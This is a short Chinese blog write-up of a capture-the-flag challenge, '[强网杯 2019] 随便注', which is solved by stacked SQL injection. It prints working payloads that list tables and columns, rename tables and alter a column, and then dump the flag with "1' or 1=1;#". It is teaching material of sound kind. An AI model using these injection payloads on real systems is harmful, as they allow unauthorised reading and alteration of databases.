[强网杯 2019] 随便注 1

[强网杯 2019]随便注 1

1.我们打开网页以后是这样的
在这里插入图片描述
2.跟进页面推出考察的应该是依赖注入
随便输点内容走走看
在这里插入图片描述

先看一下有那些表

1'; show tables;#

在这里插入图片描述
我们发现有两张表

走你

0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#

在这里插入图片描述

在这里插入图片描述
发现flag 在这个表里

到这就没思路 看大佬写的思路试了一下发现可以
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
在这之前当然要先把words表改名为其他

1';rename table `words` to words2; 
rename table `1919810931114514` to `words`;
 alter table words change flag id varchar(100);
  show tables; 
  show columns from words;# 
————————————————
版权声明:本文为CSDN博主「wow小华」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_45642610/article/details/112337143

最后上我们的 万金油

1' or 1=1;#

哈哈哈拿到结果
在这里插入图片描述

posted @   xiaojiu99  阅读(9)  评论(0编辑  收藏  举报  
相关博文:
·  [极客大挑战 2019]Havefun 1
·  BUUCTF: [极客大挑战 2019]EasySQL 1
·  [强网杯 2019]随便注 1
·  强网杯 2019 随便注
·  [强网杯 2019]随便注 1\[极客大挑战 2019]EasySQL 1、堆叠注入、联合注入、构造payload
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示
AI IDE Trae